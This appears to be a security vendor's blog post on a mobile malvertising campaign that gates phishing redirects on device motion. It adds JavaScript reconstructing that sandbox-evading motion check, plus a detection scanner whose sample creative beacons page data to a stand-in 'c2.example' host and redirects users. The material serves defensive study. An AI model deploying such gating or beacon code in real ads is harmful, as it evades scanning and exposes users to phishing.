Mobile-specific malvertising campaign targets devices in motion and triples its reach across Demand Side Platforms in four weeks
Malvertisers have added a new twist to their campaigns: a chain of device checks and redirects that delivers phishing content to unsuspecting users. Detected and tracked by The Media Trust’s Digital Security Operations team since January, the campaign has used dozens of domains to target mobile-web users and tripled its reach in four weeks.
The campaign was isolated to seven Demand Side Platforms, several of them well known, and The Media Trust worked quickly to stop it propagating to the broader digital advertising ecosystem. To date, the campaign has not affected our media publisher clients.
How it works
Before redirecting, the malicious code verifies two conditions:
- The device is in motion, determined by checking for changes in its longitude/latitude coordinates, acceleration and gravity readings
- The creative is running in a live environment rather than under a synthetic ad tag scan
Once both checks pass, the serving domain sends the Demand Side Platform, publisher domain and campaign ID to the command and control server, which both tracks the campaign and confirms that the redirect has occurred, and then serves the user a phishing landing page.
In a final attempt to appear legitimate and to ensure it is executing on a mobile device, the landing page performs further checks to determine the ISP and mobile device model, and tailors the message it displays to the reader accordingly. If the reader is on an iPhone, the content served relates to Apple. The observed examples are for Apple devices, but nothing in the code pattern indicates that Android devices are safe from this attack. To cover its tracks, the final action removes the event listener code.
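The motion gate above is what a scanning harness has to get past before the creative will misbehave. As an added example (not code from the campaign or from The Media Trust), the following reconstructs that kind of gate and the synthetic sensor streams a harness would need to inject. The thresholds, field names and sample shapes are assumptions, chosen to mirror the browser Geolocation (coords.latitude/longitude) and DeviceMotionEvent (accelerationIncludingGravity.x/y/z) APIs; it runs in Node without a browser.

```javascript
// Added example, not the campaign's code: a reconstruction of a motion gate
// of the kind described above, plus synthetic streams a scanner could feed it.
// Thresholds are assumptions: 1e-5 degrees is roughly one metre of latitude,
// and 0.5 m/s^2 is well above the sensor noise of a phone resting on a table.
const GATE = { minCoordDelta: 1e-5, minAccelDelta: 0.5, minMovingTicks: 3 };

// One tick of what a page can observe: a geolocation reading plus a
// DeviceMotionEvent-style acceleration-including-gravity vector.
function sample(lat, lon, ax, ay, az) {
  return { coords: { latitude: lat, longitude: lon },
           accelerationIncludingGravity: { x: ax, y: ay, z: az } };
}

// Change between two consecutive samples: coordinate drift and the magnitude
// of the change in the acceleration-plus-gravity vector.
function sampleDelta(a, b) {
  const g1 = a.accelerationIncludingGravity, g2 = b.accelerationIncludingGravity;
  return {
    dLat: Math.abs(b.coords.latitude - a.coords.latitude),
    dLon: Math.abs(b.coords.longitude - a.coords.longitude),
    dAcc: Math.hypot(g2.x - g1.x, g2.y - g1.y, g2.z - g1.z),
  };
}

// True only when, for minMovingTicks consecutive ticks, both the position and
// the acceleration vector change. A desktop browser (no motion sensor), an
// emulator pinned to one location and a phone lying still all fail; so does a
// phone shaken on the spot, because its coordinates never move.
function deviceInMotion(samples, gate = GATE) {
  let moving = 0;
  for (let i = 1; i < samples.length; i++) {
    const a = samples[i - 1], b = samples[i];
    if (!a.accelerationIncludingGravity || !b.accelerationIncludingGravity) return false;
    const d = sampleDelta(a, b);
    const coordsMoved = d.dLat > gate.minCoordDelta || d.dLon > gate.minCoordDelta;
    moving = coordsMoved && d.dAcc > gate.minAccelDelta ? moving + 1 : 0;
    if (moving >= gate.minMovingTicks) return true;
  }
  return false;
}

// Constructed streams, one sample per second, that a scanning harness could inject.
const START = { lat: 40.7128, lon: -74.006 };

// Walking north at about 1.4 m/s (~1.26e-5 degrees of latitude per second) with
// a gait that swings vertical acceleration +/-2 m/s^2 around gravity.
function syntheticWalk(ticks) {
  return Array.from({ length: ticks }, (_, t) =>
    sample(START.lat + t * 1.26e-5, START.lon, 0, 0, 9.81 + 2 * Math.sin(t * Math.PI / 2)));
}

// Phone at rest: fixed position, gravity only.
function stationary(ticks) {
  return Array.from({ length: ticks }, () => sample(START.lat, START.lon, 0, 0, 9.81));
}

// Phone shaken in place: acceleration changes, position does not.
function shakenInPlace(ticks) {
  return Array.from({ length: ticks }, (_, t) =>
    sample(START.lat, START.lon, 0, 0, 9.81 + 2 * Math.sin(t * Math.PI / 2)));
}

// Desktop or headless scanner: geolocation may be mocked to move, but there is
// no motion sensor, so accelerationIncludingGravity is null.
function desktop(ticks) {
  return Array.from({ length: ticks }, (_, t) =>
    ({ coords: { latitude: START.lat + t * 1.26e-5, longitude: START.lon },
       accelerationIncludingGravity: null }));
}

for (const [name, stream] of [['walk', syntheticWalk(6)], ['stationary', stationary(6)],
                              ['shaken', shakenInPlace(6)], ['desktop', desktop(6)]]) {
  console.log(name.padEnd(10), deviceInMotion(stream) ? 'passes gate' : 'fails gate');
}
```

Only the walking stream passes; the point for defenders is that a scan environment must synthesize correlated position and motion changes over several ticks, not just a mobile user agent, or the creative never reaches its redirect stage.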
How you can protect your digital advertising ecosystem
Continuous scanning and analysis caught Vertigo-3PC, the name given to this campaign, despite its sophisticated multi-stage operation. The Media Trust’s Digital Security and Operations team used the results of one scan to identify additional code signatures and hunt for related malicious campaigns. Once confirmed, the indicators of compromise are automatically added to our blocklist, which feeds Media Filter, our malware-blocking solution for media publishers.
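As an added example of the kind of code-signature hunt described above (not The Media Trust’s scanner, whose signatures are not published; the patterns, weights and both ad creatives below are constructed for this example), the following JavaScript looks for the combination of behaviours listed under “How it works”: sensor listeners, a tracking beacon, a redirect, and a listener that removes itself. It first undoes two cheap string-obfuscation tricks (hex escapes and literal concatenation); heavier obfuscation defeats static matching, which is why runtime, client-side scanning of the rendered creative matters.

```javascript
// Added example, not The Media Trust's tooling: a signature hunt over ad
// creative source for the behaviour chain described on this page.
// Signature ids, regexes and weights are assumptions for illustration.
const SIGNATURES = [
  { id: 'motion-listener', weight: 2,
    re: /addEventListener\s*\(\s*['"](?:devicemotion|deviceorientation)['"]/ },
  { id: 'geo-watch', weight: 2,
    re: /navigator\.geolocation\.(?:watchPosition|getCurrentPosition)\s*\(/ },
  { id: 'gravity-read', weight: 1, re: /accelerationIncludingGravity/ },
  { id: 'beacon', weight: 1,
    re: /(?:navigator\.sendBeacon\s*\(|new\s+Image\s*\(\s*\)[\s\S]{0,80}\.src\s*=)/ },
  { id: 'redirect', weight: 2,
    re: /(?:(?:top|window|parent|document)\.)?location\.(?:replace|assign|href)\s*[=(]/ },
  { id: 'self-cleanup', weight: 2,
    re: /removeEventListener\s*\(\s*['"](?:devicemotion|deviceorientation)['"]/ },
];
const SENSOR_IDS = new Set(['motion-listener', 'geo-watch', 'gravity-read']);

// Undo \xNN / \uNNNN escapes and 'a' + 'b' literal concatenation so that
// 'devicem' + 'otion' and '\x64evicemotion' both match the signatures above.
// This is deliberately naive (no real tokenizer) and only handles the simplest
// string splitting; anything heavier needs runtime observation instead.
function normalize(src) {
  let s = src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  let prev;
  do {
    prev = s;
    s = s.replace(/'([^'\\]*)'\s*\+\s*'([^'\\]*)'/g, "'$1$2'")
         .replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, '"$1$2"');
  } while (s !== prev);
  return s;
}

// A redirect on its own is normal for an ad (click-through); the creative is
// flagged only when a redirect is combined with sensor-gating code.
function scanCreative(source) {
  const text = normalize(source);
  const hits = SIGNATURES.filter(s => s.re.test(text)).map(s => s.id);
  const score = SIGNATURES.filter(s => hits.includes(s.id))
                          .reduce((n, s) => n + s.weight, 0);
  const usesSensors = hits.some(id => SENSOR_IDS.has(id));
  return { flagged: usesSensors && hits.includes('redirect'), score, hits };
}

// Constructed benign creative: an ordinary click-through.
const BENIGN = `
  var clickUrl = 'https://advertiser.example/landing';
  document.getElementById('ad').addEventListener('click', function () {
    top.location.href = clickUrl;
  });
`;

// Constructed suspicious creative following the chain described on this page:
// motion gate, geolocation watch, beacon with publisher and campaign id,
// listener removal, then an unsolicited redirect. Lightly obfuscated.
const SUSPICIOUS = `
  var last = null, moved = 0, pos = null, cid = 'c-123';
  navigator.geolocation.watchPosition(function (p) { pos = p.coords; });
  function h(e) {
    var g = e.accelerationIncludingGravity;
    if (last && Math.abs(g.z - last.z) > 0.5) moved++;
    last = g;
    if (moved > 2 && pos) {
      (new Image()).src = 'https://c2.example/t?pub=' + location.hostname + '&cid=' + cid;
      window.removeEventListener('\\x64evicemotion', h);
      top.location.replace('https://landing.example/' + navigator.userAgent);
    }
  }
  window.addEventListener('devicem' + 'otion', h);
`;

console.log('benign    ', scanCreative(BENIGN));
console.log('suspicious', scanCreative(SUSPICIOUS));
```

The benign creative registers only the redirect signature and is not flagged; the suspicious one trips all six and is. In practice the hits from one confirmed sample (which listener names, which beacon shape, which cleanup call) become the signatures used to hunt for sibling creatives across other DSPs, which is the workflow the paragraph above describes.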
Vertigo-3PC is another example of how continuous, client-side scanning identifies highly obfuscated malware and quickly refreshes our malware blocking list.